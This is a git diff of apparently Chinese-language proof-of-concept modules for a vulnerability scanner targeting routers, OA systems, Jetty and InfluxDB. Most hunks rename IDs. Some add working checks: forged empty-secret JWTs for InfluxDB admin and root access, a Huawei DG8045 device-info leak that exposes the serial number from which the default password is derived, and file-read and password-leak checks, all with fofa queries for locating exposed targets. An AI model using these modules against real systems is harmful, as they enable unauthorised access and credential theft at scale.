Binary files /dev/null and b/poc/HIKVISION/File_Read_Stream_Media_Manager/__pycache__/poc.cpython-38.pyc differ
diff --git a/poc/HIKVISION/Weak_Pass_Stream_Media_Manager/__pycache__/poc.cpython-38.pyc b/poc/HIKVISION/Weak_Pass_Stream_Media_Manager/__pycache__/poc.cpython-38.pyc
new file mode 100644
index 0000000..cf622b1
Binary files /dev/null and b/poc/HIKVISION/Weak_Pass_Stream_Media_Manager/__pycache__/poc.cpython-38.pyc differ
diff --git a/poc/HIKVISION/Weak_Pass_Stream_Media_Manager/poc.py b/poc/HIKVISION/Weak_Pass_Stream_Media_Manager/poc.py
index f91693b..de772eb 100644
--- a/poc/HIKVISION/Weak_Pass_Stream_Media_Manager/poc.py
+++ b/poc/HIKVISION/Weak_Pass_Stream_Media_Manager/poc.py
@@ -18,7 +18,7 @@ class POC(POCBase):
""", # POC描述,写更新描述,没有就不写
"name" : "HIKVISION 流媒体管理服务器弱口令", # 漏洞名称
- "VulnID" : "Blen-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可
+ "VulnID" : "oFx-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可
"AppName" : "HIKVISION 流媒体管理服务器", # 漏洞应用名称
"AppVersion" : "", # 漏洞应用版本
"VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx
diff --git a/poc/HST_好视通/File_Download/__pycache__/poc.cpython-38.pyc b/poc/HST_好视通/File_Download/__pycache__/poc.cpython-38.pyc
new file mode 100644
index 0000000..db3a54a
Binary files /dev/null and b/poc/HST_好视通/File_Download/__pycache__/poc.cpython-38.pyc differ
diff --git a/poc/HST_好视通/File_Download/poc.py b/poc/HST_好视通/File_Download/poc.py
index 05f8662..cf6e603 100644
--- a/poc/HST_好视通/File_Download/poc.py
+++ b/poc/HST_好视通/File_Download/poc.py
@@ -18,7 +18,7 @@ class POC(POCBase):
""", # POC描述,写更新描述,没有就不写
"name" : "好视通视频会议平台 任意文件下载", # 漏洞名称
- "VulnID" : "Blen-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可
+ "VulnID" : "oFx-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可
"AppName" : "好视通视频会议平台", # 漏洞应用名称
"AppVersion" : "", # 漏洞应用版本
"VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx
diff --git a/poc/Hongdian_宏电/Backstage_File_Read_CVE_2021_28152/__pycache__/poc.cpython-38.pyc b/poc/Hongdian_宏电/Backstage_File_Read_CVE_2021_28152/__pycache__/poc.cpython-38.pyc
new file mode 100644
index 0000000..0667b57
Binary files /dev/null and b/poc/Hongdian_宏电/Backstage_File_Read_CVE_2021_28152/__pycache__/poc.cpython-38.pyc differ
diff --git a/poc/Hongdian_宏电/Backstage_File_Read_CVE_2021_28152/poc.py b/poc/Hongdian_宏电/Backstage_File_Read_CVE_2021_28152/poc.py
index c70cd25..d0a25fe 100644
--- a/poc/Hongdian_宏电/Backstage_File_Read_CVE_2021_28152/poc.py
+++ b/poc/Hongdian_宏电/Backstage_File_Read_CVE_2021_28152/poc.py
@@ -10,11 +10,12 @@ class POC(POCBase):
_info = {
"author" : "jijue", # POC作者
- "version" : "1", # POC版本,默认是1
+ "version" : "2", # POC版本,默认是1
"CreateDate" : "2021-06-09", # POC创建时间
"UpdateDate" : "2021-06-09", # POC创建时间
"PocDesc" : """
- 笔者没有zoomeye高级账号,所以就没测试了,换而言之,该POC不一定靠谱
+ v1 : 笔者没有zoomeye高级账号,所以就没测试了,换而言之,该POC不一定靠谱
+ v2 : 笔者特地去zoomeye找资产测试,然后做了点优化,这回应该靠谱了
""", # POC描述,写更新描述,没有就不写
"name" : "宏电 H8922 后台任意文件读取漏洞", # 漏洞名称
@@ -56,7 +57,7 @@ class POC(POCBase):
检测逻辑,漏洞存在则修改vuln值为True,漏洞不存在则不动
"""
req = requests.get(url,headers = headers , proxies = self.proxy ,timeout = self.timeout,verify = False)
- if "root:" in req.text and req.status_code == 200:
+ if "root:" in req.text and req.status_code == 200 and "application/octet-stream" in req.headers["Content-Type"]:
vuln = [True,req.text]
else:
vuln = [False,req.text]
diff --git a/poc/Huawei/File_Read_HG659_lib/__pycache__/poc.cpython-38.pyc b/poc/Huawei/File_Read_HG659_lib/__pycache__/poc.cpython-38.pyc
new file mode 100644
index 0000000..a1041ba
Binary files /dev/null and b/poc/Huawei/File_Read_HG659_lib/__pycache__/poc.cpython-38.pyc differ
diff --git a/poc/Huawei/File_Read_HG659_lib/poc.py b/poc/Huawei/File_Read_HG659_lib/poc.py
index 30a0d26..28938e5 100644
--- a/poc/Huawei/File_Read_HG659_lib/poc.py
+++ b/poc/Huawei/File_Read_HG659_lib/poc.py
@@ -18,7 +18,7 @@ class POC(POCBase):
""", # POC描述,写更新描述,没有就不写
"name" : "Huawei HG659 lib 任意文件读取漏洞", # 漏洞名称
- "VulnID" : "Blen-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可
+ "VulnID" : "oFx-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可
"AppName" : "Huawei HG659", # 漏洞应用名称
"AppVersion" : "", # 漏洞应用版本
"VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx
diff --git a/poc/Huawei/Info_Disclosure_DG8045/__pycache__/poc.cpython-38.pyc b/poc/Huawei/Info_Disclosure_DG8045/__pycache__/poc.cpython-38.pyc
new file mode 100644
index 0000000..c8cf81c
Binary files /dev/null and b/poc/Huawei/Info_Disclosure_DG8045/__pycache__/poc.cpython-38.pyc differ
diff --git a/poc/Huawei/Info_Disclosure_DG8045/poc.py b/poc/Huawei/Info_Disclosure_DG8045/poc.py
new file mode 100644
index 0000000..91900a6
--- /dev/null
+++ b/poc/Huawei/Info_Disclosure_DG8045/poc.py
@@ -0,0 +1,74 @@
+# coding:utf-8
+import requests
+from lib.core.common import url_handle,get_random_ua
+from lib.core.poc import POCBase
+# ...
+import urllib3
+urllib3.disable_warnings()
+
+class POC(POCBase):
+
+ _info = {
+ "author" : "jijue", # POC作者
+ "version" : "1", # POC版本,默认是1
+ "CreateDate" : "2022-01-01", # POC创建时间
+ "UpdateDate" : "2022-01-01", # POC创建时间
+ "PocDesc" : """
+ 略
+ """, # POC描述,写更新描述,没有就不写
+
+ "name" : "华为路由器敏感信息泄露 DG8045 Router 1.0", # 漏洞名称
+ "VulnID" : "oFx-2022-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可
+ "AppName" : "华为DG8045路由器", # 漏洞应用名称
+ "AppVersion" : "1.0版本", # 漏洞应用版本
+ "VulnDate" : "2022-01-01", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx
+ "VulnDesc" : """
+ 路由器默认密码是序列号的最后8位
+ """, # 漏洞简要描述
+
+ "fofa-dork":"""
+ app="DG8045-Home-Gateway-DG8045"
+ """, # fofa搜索语句
+ "example" : "", # 存在漏洞的演示url,写一个就可以了
+ "exp_img" : "", # 先不管
+ }
+
+ def _verify(self):
+ """
+ 返回vuln
+
+ 存在漏洞:vuln = [True,html_source] # html_source就是页面源码
+
+ 不存在漏洞:vuln = [False,""]
+ """
+ vuln = [False,""]
+ url = self.target + "/api/system/deviceinfo" # url自己按需调整
+
+
+ headers = {
+ "User-Agent":get_random_ua(),
+ "Connection":"close",
+ "X-Requested-With": "XMLHttpRequest",
+ # "Content-Type": "application/x-www-form-urlencoded",
+ }
+
+ try:
+ """
+ 检测逻辑,漏洞存在则修改vuln值为True,漏洞不存在则不动
+ """
+ req = requests.get(url,headers = headers , proxies = self.proxy ,timeout = self.timeout,verify = False)
+ if "SerialNumber" in req.text and "DeviceName" in req.text:
+ vuln = [True,req.text]
+ else:
+ vuln = [False,req.text]
+ except Exception as e:
+ raise e
+
+ # 以下逻辑酌情使用
+ if self._honeypot_check(vuln[1]) == True:
+ vuln[0] = False
+
+ return vuln
+
+ def _attack(self):
+ return self._verify()
\ No newline at end of file
diff --git a/poc/HuiWen_汇文/Info_Disclosure/__pycache__/poc.cpython-38.pyc b/poc/HuiWen_汇文/Info_Disclosure/__pycache__/poc.cpython-38.pyc
new file mode 100644
index 0000000..3039b9b
Binary files /dev/null and b/poc/HuiWen_汇文/Info_Disclosure/__pycache__/poc.cpython-38.pyc differ
diff --git a/poc/HuiWen_汇文/Weak_Pass/__pycache__/poc.cpython-38.pyc b/poc/HuiWen_汇文/Weak_Pass/__pycache__/poc.cpython-38.pyc
new file mode 100644
index 0000000..5e0e0f5
Binary files /dev/null and b/poc/HuiWen_汇文/Weak_Pass/__pycache__/poc.cpython-38.pyc differ
diff --git a/poc/HuiWen_汇文/Weak_Pass/poc.py b/poc/HuiWen_汇文/Weak_Pass/poc.py
index 81d6cfb..3a260b3 100644
--- a/poc/HuiWen_汇文/Weak_Pass/poc.py
+++ b/poc/HuiWen_汇文/Weak_Pass/poc.py
@@ -19,7 +19,7 @@ class POC(POCBase):
""", # POC描述,写更新描述,没有就不写
"name" : "汇文OPAC弱口令", # 漏洞名称
- "VulnID" : "Blen-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可
+ "VulnID" : "oFx-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可
"AppName" : "汇文OPAC", # 漏洞应用名称
"AppVersion" : "", # 漏洞应用版本
"VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx
diff --git a/poc/IFW8_蜂网互联/UPInfo_DisClosure_CVE_2019_16313/__pycache__/poc.cpython-38.pyc b/poc/IFW8_蜂网互联/UPInfo_DisClosure_CVE_2019_16313/__pycache__/poc.cpython-38.pyc
new file mode 100644
index 0000000..cd341f6
Binary files /dev/null and b/poc/IFW8_蜂网互联/UPInfo_DisClosure_CVE_2019_16313/__pycache__/poc.cpython-38.pyc differ
diff --git a/poc/IFW8_蜂网互联/UPInfo_DisClosure_CVE_2019_16313/poc.py b/poc/IFW8_蜂网互联/UPInfo_DisClosure_CVE_2019_16313/poc.py
index 2b3b049..ca42430 100644
--- a/poc/IFW8_蜂网互联/UPInfo_DisClosure_CVE_2019_16313/poc.py
+++ b/poc/IFW8_蜂网互联/UPInfo_DisClosure_CVE_2019_16313/poc.py
@@ -4,17 +4,19 @@ from lib.core.common import url_handle,get_random_ua
from lib.core.poc import POCBase
# ...
import urllib3
+import re
urllib3.disable_warnings()
class POC(POCBase):
_info = {
"author" : "jijue", # POC作者
- "version" : "1", # POC版本,默认是1
+ "version" : "2", # POC版本,默认是1
"CreateDate" : "2021-06-09", # POC创建时间
"UpdateDate" : "2021-06-09", # POC创建时间
"PocDesc" : """
- 略
+ v1 : 略
+ v2 : v1是字符串匹配,最然当时已经写得很严谨了,但仍有万分之一的几率会误报,改成了正则匹配可以解决
""", # POC描述,写更新描述,没有就不写
"name" : "蜂网互联 企业级路由器v4.31 密码泄露漏洞", # 漏洞名称
@@ -54,8 +56,9 @@ class POC(POCBase):
"""
检测逻辑,漏洞存在则修改vuln值为True,漏洞不存在则不动
"""
- req = requests.get(url,headers = headers , proxies = self.proxy ,timeout = self.timeout,verify = False)
- if "note" in req.text and "status" in req.text and "pwd" in req.text and "aju" in req.text and req.status_code == 200:
+ req = requests.get(url,headers = headers , proxies = self.proxy ,timeout = self.timeout,verify = False , allow_redirects=False)
+ result = re.match("\{\"state\":1,\"rows\":\[\{\".+\}\]\}",req.text.strip())
+ if result != None and req.status_code == 200:
vuln = [True,req.text]
else:
vuln = [False,req.text]
diff --git a/poc/InfluxDB/FingerPrint/__pycache__/poc.cpython-38.pyc b/poc/InfluxDB/FingerPrint/__pycache__/poc.cpython-38.pyc
new file mode 100644
index 0000000..8aa716f
Binary files /dev/null and b/poc/InfluxDB/FingerPrint/__pycache__/poc.cpython-38.pyc differ
diff --git a/poc/InfluxDB/FingerPrint/poc.py b/poc/InfluxDB/FingerPrint/poc.py
new file mode 100644
index 0000000..865463d
--- /dev/null
+++ b/poc/InfluxDB/FingerPrint/poc.py
@@ -0,0 +1,75 @@
+# coding:utf-8
+import requests
+from lib.core.common import url_handle,get_random_ua
+from lib.core.poc import POCBase
+# ...
+import urllib3
+urllib3.disable_warnings()
+
+class POC(POCBase):
+
+ _info = {
+ "author" : "jijue", # POC作者
+ "version" : "1", # POC版本,默认是1
+ "CreateDate" : "2022-01-01", # POC创建时间
+ "UpdateDate" : "2022-01-01", # POC创建时间
+ "PocDesc" : """
+ 略
+ """, # POC描述,写更新描述,没有就不写
+
+ "name" : "InfluxDB指纹识别", # 漏洞名称
+ "VulnID" : "oFx-2022-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可
+ "AppName" : "InfluxDB", # 漏洞应用名称
+ "AppVersion" : "", # 漏洞应用版本
+ "VulnDate" : "2022-01-01", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx
+ "VulnDesc" : """
+ InfluxDB默认把Web界面运行在8083端口、把API接口运行在8086端口
+ 响应包是会有两个头,分别是X-Influxdb-Version和X-Influxdb-Build
+
+ 该指纹识别成功后会直接返回header给控制台,方便肉眼识别
+ """, # 漏洞简要描述
+
+ "fofa-dork":"""
+ app="influxdata-InfluxDB"
+ """, # fofa搜索语句
+ "example" : "", # 存在漏洞的演示url,写一个就可以了
+ "exp_img" : "", # 先不管
+ }
+
+ def _verify(self):
+ """
+ 返回vuln
+
+ 存在漏洞:vuln = [True,html_source] # html_source就是页面源码
+
+ 不存在漏洞:vuln = [False,""]
+ """
+ vuln = [False,""]
+ url = self.target + "" # url自己按需调整
+
+
+ headers = {"User-Agent":get_random_ua(),
+ "Connection":"close",
+ # "Content-Type": "application/x-www-form-urlencoded",
+ }
+
+ try:
+ """
+ 检测逻辑,漏洞存在则修改vuln值为True,漏洞不存在则不动
+ """
+ req = requests.get(url,headers = headers , proxies = self.proxy ,timeout = self.timeout,verify = False)
+ if "X-Influxdb-Version" in req.headers or "X-Influxdb-Build" in req.headers:
+ vuln = [True,req.headers]
+ else:
+ vuln = [False,req.headers]
+ except Exception as e:
+ raise e
+
+ # 以下逻辑酌情使用
+ if self._honeypot_check(vuln[1]) == True:
+ vuln[0] = False
+
+ return vuln
+
+ def _attack(self):
+ return self._verify()
\ No newline at end of file
diff --git a/poc/InfluxDB/UnAuth_Access/__pycache__/poc.cpython-38.pyc b/poc/InfluxDB/UnAuth_Access/__pycache__/poc.cpython-38.pyc
new file mode 100644
index 0000000..27cd36d
Binary files /dev/null and b/poc/InfluxDB/UnAuth_Access/__pycache__/poc.cpython-38.pyc differ
diff --git a/poc/InfluxDB/UnAuth_Access/poc.py b/poc/InfluxDB/UnAuth_Access/poc.py
new file mode 100644
index 0000000..3f1a6e7
--- /dev/null
+++ b/poc/InfluxDB/UnAuth_Access/poc.py
@@ -0,0 +1,96 @@
+# coding:utf-8
+from matplotlib import rc_params_from_file
+import requests
+import re
+from lib.core.common import url_handle,get_random_ua
+from lib.core.poc import POCBase
+# ...
+import urllib3
+urllib3.disable_warnings()
+
+class POC(POCBase):
+
+ _info = {
+ "author" : "jijue", # POC作者
+ "version" : "1", # POC版本,默认是1
+ "CreateDate" : "2022-01-01", # POC创建时间
+ "UpdateDate" : "2022-01-01", # POC创建时间
+ "PocDesc" : """
+ 略
+ """, # POC描述,写更新描述,没有就不写
+
+ "name" : "InfluxDB 未授权访问", # 漏洞名称
+ "VulnID" : "oFx-2022-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可
+ "AppName" : "InfluxDB", # 漏洞应用名称
+ "AppVersion" : "", # 漏洞应用版本
+ "VulnDate" : "2022-01-01", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx
+ "VulnDesc" : """
+ influxdb是一款著名的时序数据库,其使用jwt作为鉴权方式。
+ 在用户开启了认证,但未设置参数shared-secret的情况下,jwt的认证密钥为空字符串,此时攻击者可以伪造任意用户身份在influxdb中执行SQL语句。
+
+ 笔者注意到JWT凭据中的用户名错误时会返回user not found,
+ 这仅代表用户名错误,但漏洞实际上是存在的,只是需要枚举出正确的用户名而已,
+ 出于批量扫描时的效率考虑笔者并不打算弄一个庞大的字典文件来做枚举的工作,仅证明漏洞存在即可
+ """, # 漏洞简要描述
+
+ "fofa-dork":"""
+ app="influxdata-InfluxDB"
+ """, # fofa搜索语句
+ "example" : "", # 存在漏洞的演示url,写一个就可以了
+ "exp_img" : "", # 先不管
+ }
+
+ def _verify(self):
+ """
+ 返回vuln
+
+ 存在漏洞:vuln = [True,html_source] # html_source就是页面源码
+
+ 不存在漏洞:vuln = [False,""]
+ """
+ vuln = [False,""]
+ url = self.target + "/query" # url自己按需调整
+ data = "db=sample&q=show+users"
+
+ users = [
+ "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiZXhwIjozMzkyODM4NDI3fQ.nLFbzdjmyXA8JaaNPTQJx2V7QaY7QKdNEk8J37KzjKg", # admin
+ "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6InJvb3QiLCJleHAiOjMzOTI4Mzg0Mjd9.CQoA4qksl5JlbZvuxDZ5NbxTYBVKgw38zaFFuknB2Bk", # root
+ "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImluZmx1eGRiIiwiZXhwIjozMzkyODM4NDI3fQ.if5__J9oZcNotrNnLTC_DoVS4sryD8oaq0n3mx55q_Q" # influxdb
+ ]
+
+ # 用户名正确时
+ regular0 = """\{"results":\[\{("statement_id":\d,)?"series":\[\{"columns":\[.+"""
+ # 用户名错误时
+ regular1 = """\{"error":"user not found"\}"""
+ headers = {"User-Agent":get_random_ua(),
+ "Connection":"close",
+ "Authorization":"",
+ "Content-Type": "application/x-www-form-urlencoded",
+ }
+
+ try:
+ """
+ 检测逻辑,漏洞存在则修改vuln值为True,漏洞不存在则不动
+ """
+ for i in users:
+ headers["Authorization"] = "Bearer " + i
+ req = requests.post(url,data = data,headers = headers , proxies = self.proxy ,timeout = self.timeout,verify = False)
+ if req.status_code == 200 and re.match(regular0,req.text.strip()):
+ vuln = [True,req.text]
+ break
+ elif req.status_code == 401 and re.match(regular1,req.text.strip()):
+ vuln = [True,req.text]
+ break
+ else:
+ vuln = [False,req.text]
+ except Exception as e:
+ raise e
+
+ # 以下逻辑酌情使用
+ if self._honeypot_check(vuln[1]) == True:
+ vuln[0] = False
+
+ return vuln
+
+ def _attack(self):
+ return self._verify()
\ No newline at end of file
diff --git a/poc/Intelbras/UPInfo_Disclosure_CVE_2021_3017/__pycache__/poc.cpython-38.pyc b/poc/Intelbras/UPInfo_Disclosure_CVE_2021_3017/__pycache__/poc.cpython-38.pyc
new file mode 100644
index 0000000..d97b9a1
Binary files /dev/null and b/poc/Intelbras/UPInfo_Disclosure_CVE_2021_3017/__pycache__/poc.cpython-38.pyc differ
diff --git a/poc/Jboss/Unauth_Access/__pycache__/poc.cpython-38.pyc b/poc/Jboss/Unauth_Access/__pycache__/poc.cpython-38.pyc
new file mode 100644
index 0000000..a854b29
Binary files /dev/null and b/poc/Jboss/Unauth_Access/__pycache__/poc.cpython-38.pyc differ
diff --git a/poc/Jenkins/Unauth_Access/__pycache__/poc.cpython-38.pyc b/poc/Jenkins/Unauth_Access/__pycache__/poc.cpython-38.pyc
new file mode 100644
index 0000000..7ed8a24
Binary files /dev/null and b/poc/Jenkins/Unauth_Access/__pycache__/poc.cpython-38.pyc differ
diff --git a/poc/Jetty/File_Read_CVE_2021_34429/__pycache__/poc.cpython-38.pyc b/poc/Jetty/File_Read_CVE_2021_34429/__pycache__/poc.cpython-38.pyc
new file mode 100644
index 0000000..9611e78
Binary files /dev/null and b/poc/Jetty/File_Read_CVE_2021_34429/__pycache__/poc.cpython-38.pyc differ
diff --git a/poc/Jetty/FingerPrint/__pycache__/poc.cpython-38.pyc b/poc/Jetty/FingerPrint/__pycache__/poc.cpython-38.pyc
new file mode 100644
index 0000000..a057572
Binary files /dev/null and b/poc/Jetty/FingerPrint/__pycache__/poc.cpython-38.pyc differ
diff --git a/poc/Jetty/FingerPrint/poc.py b/poc/Jetty/FingerPrint/poc.py
index d890545..541d1b0 100644
--- a/poc/Jetty/FingerPrint/poc.py
+++ b/poc/Jetty/FingerPrint/poc.py
@@ -18,7 +18,7 @@ class POC(POCBase):
""", # POC描述,写更新描述,没有就不写
"name" : "Jetty指纹识别", # 漏洞名称
- "VulnID" : "Blen-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可
+ "VulnID" : "oFx-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可
"AppName" : "Jetty", # 漏洞应用名称
"AppVersion" : "", # 漏洞应用版本
"VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx
diff --git a/poc/Jetty/Info_Disclosure_CVE_2021_28164/__pycache__/poc.cpython-38.pyc b/poc/Jetty/Info_Disclosure_CVE_2021_28164/__pycache__/poc.cpython-38.pyc
new file mode 100644
index 0000000..d10b92d
Binary files /dev/null and b/poc/Jetty/Info_Disclosure_CVE_2021_28164/__pycache__/poc.cpython-38.pyc differ
diff --git a/poc/Jetty/Info_Disclosure_CVE_2021_28164/poc.py b/poc/Jetty/Info_Disclosure_CVE_2021_28164/poc.py
index 2d99681..1e96166 100644
--- a/poc/Jetty/Info_Disclosure_CVE_2021_28164/poc.py
+++ b/poc/Jetty/Info_Disclosure_CVE_2021_28164/poc.py
@@ -19,7 +19,7 @@ class POC(POCBase):
""", # POC描述,写更新描述,没有就不写
"name" : "Jetty WEB-INF 敏感信息泄露漏洞(CVE-2021-28164)", # 漏洞名称
- "VulnID" : "Blen-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可
+ "VulnID" : "oFx-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可
"AppName" : "", # 漏洞应用名称
"AppVersion" : "", # 漏洞应用版本
"VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx
diff --git a/poc/Jetty/Info_Disclosure_CVE_2021_28169/__pycache__/poc.cpython-38.pyc b/poc/Jetty/Info_Disclosure_CVE_2021_28169/__pycache__/poc.cpython-38.pyc
new file mode 100644
index 0000000..7ae8d15
Binary files /dev/null and b/poc/Jetty/Info_Disclosure_CVE_2021_28169/__pycache__/poc.cpython-38.pyc differ
diff --git a/poc/Jinher_金和OA/File_Read_download_jsp/__pycache__/poc.cpython-38.pyc b/poc/Jinher_金和OA/File_Read_download_jsp/__pycache__/poc.cpython-38.pyc
new file mode 100644
index 0000000..1d81447
Binary files /dev/null and b/poc/Jinher_金和OA/File_Read_download_jsp/__pycache__/poc.cpython-38.pyc differ
diff --git a/poc/Jinher_金和OA/File_Read_download_jsp/poc.py b/poc/Jinher_金和OA/File_Read_download_jsp/poc.py
index cb16056..24d55be 100644
--- a/poc/Jinher_金和OA/File_Read_download_jsp/poc.py
+++ b/poc/Jinher_金和OA/File_Read_download_jsp/poc.py
@@ -18,7 +18,7 @@ class POC(POCBase):
""", # POC描述,写更新描述,没有就不写
"name" : "金和OA C6 download.jsp 任意文件读取漏洞", # 漏洞名称
- "VulnID" : "Blen-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可
+ "VulnID" : "oFx-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可
"AppName" : "", # 漏洞应用名称
"AppVersion" : "", # 漏洞应用版本
"VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx
diff --git a/poc/KEDACOM_数字系统接入网关/File_Read/__pycache__/poc.cpython-38.pyc b/poc/KEDACOM_数字系统接入网关/File_Read/__pycache__/poc.cpython-38.pyc
new file mode 100644
index 0000000..064c67f
Binary files /dev/null and b/poc/KEDACOM_数字系统接入网关/File_Read/__pycache__/poc.cpython-38.pyc differ
diff --git a/poc/KEDACOM_数字系统接入网关/File_Read/poc.py b/poc/KEDACOM_数字系统接入网关/File_Read/poc.py
index 0bd9ee7..a524753 100644
--- a/poc/KEDACOM_数字系统接入网关/File_Read/poc.py
+++ b/poc/KEDACOM_数字系统接入网关/File_Read/poc.py
@@ -18,7 +18,7 @@ class POC(POCBase):
""", # POC描述,写更新描述,没有就不写
"name" : "KEDACOM 数字系统接入网关 任意文件读取漏洞", # 漏洞名称
- "VulnID" : "Blen-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可
+ "VulnID" : "oFx-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可
"AppName" : "KEDACOM 数字系统接入网关", # 漏洞应用名称
"AppVersion" : "", # 漏洞应用版本
"VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx
diff --git a/poc/Kingdee_金蝶/Dir_List_server_file/__pycache__/poc.cpython-38.pyc b/poc/Kingdee_金蝶/Dir_List_server_file/__pycache__/poc.cpython-38.pyc
new file mode 100644
index 0000000..1bb5fc0
Binary files /dev/null and b/poc/Kingdee_金蝶/Dir_List_server_file/__pycache__/poc.cpython-38.pyc differ
diff --git a/poc/Kingdee_金蝶/Dir_List_server_file/poc.py b/poc/Kingdee_金蝶/Dir_List_server_file/poc.py
index 4adef13..1660553 100644
--- a/poc/Kingdee_金蝶/Dir_List_server_file/poc.py
+++ b/poc/Kingdee_金蝶/Dir_List_server_file/poc.py
@@ -18,7 +18,7 @@ class POC(POCBase):
""", # POC描述,写更新描述,没有就不写
"name" : "金蝶OA server_file 目录遍历漏洞", # 漏洞名称
- "VulnID" : "Blen-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可
+ "VulnID" : "oFx-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可
"AppName" : "金蝶OA", # 漏洞应用名称
"AppVersion" : "", # 漏洞应用版本
"VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx
diff --git a/poc/Kingdee_金蝶/File_Down_fileDownload_do/__pycache__/poc.cpython-38.pyc b/poc/Kingdee_金蝶/File_Down_fileDownload_do/__pycache__/poc.cpython-38.pyc
new file mode 100644
index 0000000..4269dea
Binary files /dev/null and b/poc/Kingdee_金蝶/File_Down_fileDownload_do/__pycache__/poc.cpython-38.pyc differ
diff --git a/poc/Kyan/Info_Disclosure/__pycache__/poc.cpython-38.pyc b/poc/Kyan/Info_Disclosure/__pycache__/poc.cpython-38.pyc
new file mode 100644
index 0000000..7d0a712
Binary files /dev/null and b/poc/Kyan/Info_Disclosure/__pycache__/poc.cpython-38.pyc differ
diff --git a/poc/Landray_蓝凌OA/File_Read_CNVD_2021_28277/__pycache__/poc.cpython-38.pyc b/poc/Landray_蓝凌OA/File_Read_CNVD_2021_28277/__pycache__/poc.cpython-38.pyc
new file mode 100644
index 0000000..d9110a2
Binary files /dev/null and b/poc/Landray_蓝凌OA/File_Read_CNVD_2021_28277/__pycache__/poc.cpython-38.pyc differ
diff --git a/poc/Laravel_Framework/Conf_Info_Disclosure_dot_env/__pycache__/poc.cpython-38.pyc b/poc/Laravel_Framework/Conf_Info_Disclosure_dot_env/__pycache__/poc.cpython-38.pyc
new file mode 100644
index 0000000..b2545dc
Binary files /dev/null and b/poc/Laravel_Framework/Conf_Info_Disclosure_dot_env/__pycache__/poc.cpython-38.pyc differ
diff --git a/poc/LiPu_利谱第二代防火墙/Info_Disclosure/__pycache__/poc.cpython-38.pyc b/poc/LiPu_利谱第二代防火墙/Info_Disclosure/__pycache__/poc.cpython-38.pyc
new file mode 100644
index 0000000..9b6622f
Binary files /dev/null and b/poc/LiPu_利谱第二代防火墙/Info_Disclosure/__pycache__/poc.cpython-38.pyc differ
diff --git a/poc/LiPu_利谱第二代防火墙/Info_Disclosure/poc.py b/poc/LiPu_利谱第二代防火墙/Info_Disclosure/poc.py
index a5b1b0b..abee199 100644
--- a/poc/LiPu_利谱第二代防火墙/Info_Disclosure/poc.py
+++ b/poc/LiPu_利谱第二代防火墙/Info_Disclosure/poc.py
@@ -18,7 +18,7 @@ class POC(POCBase):
""", # POC描述,写更新描述,没有就不写
"name" : "利谱第二代防火墙存在信息泄露漏洞", # 漏洞名称
- "VulnID" : "Blen-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可
+ "VulnID" : "oFx-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可
"AppName" : "利谱第二代防火墙", # 漏洞应用名称
"AppVersion" : "", # 漏洞应用版本
"VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx
diff --git a/poc/LinkSeek_朗驰欣创/FTP_Account_Info_Disclosure/__pycache__/poc.cpython-38.pyc b/poc/LinkSeek_朗驰欣创/FTP_Account_Info_Disclosure/__pycache__/poc.cpython-38.pyc
new file mode 100644
index 0000000..344e84c
Binary files /dev/null and b/poc/LinkSeek_朗驰欣创/FTP_Account_Info_Disclosure/__pycache__/poc.cpython-38.pyc differ
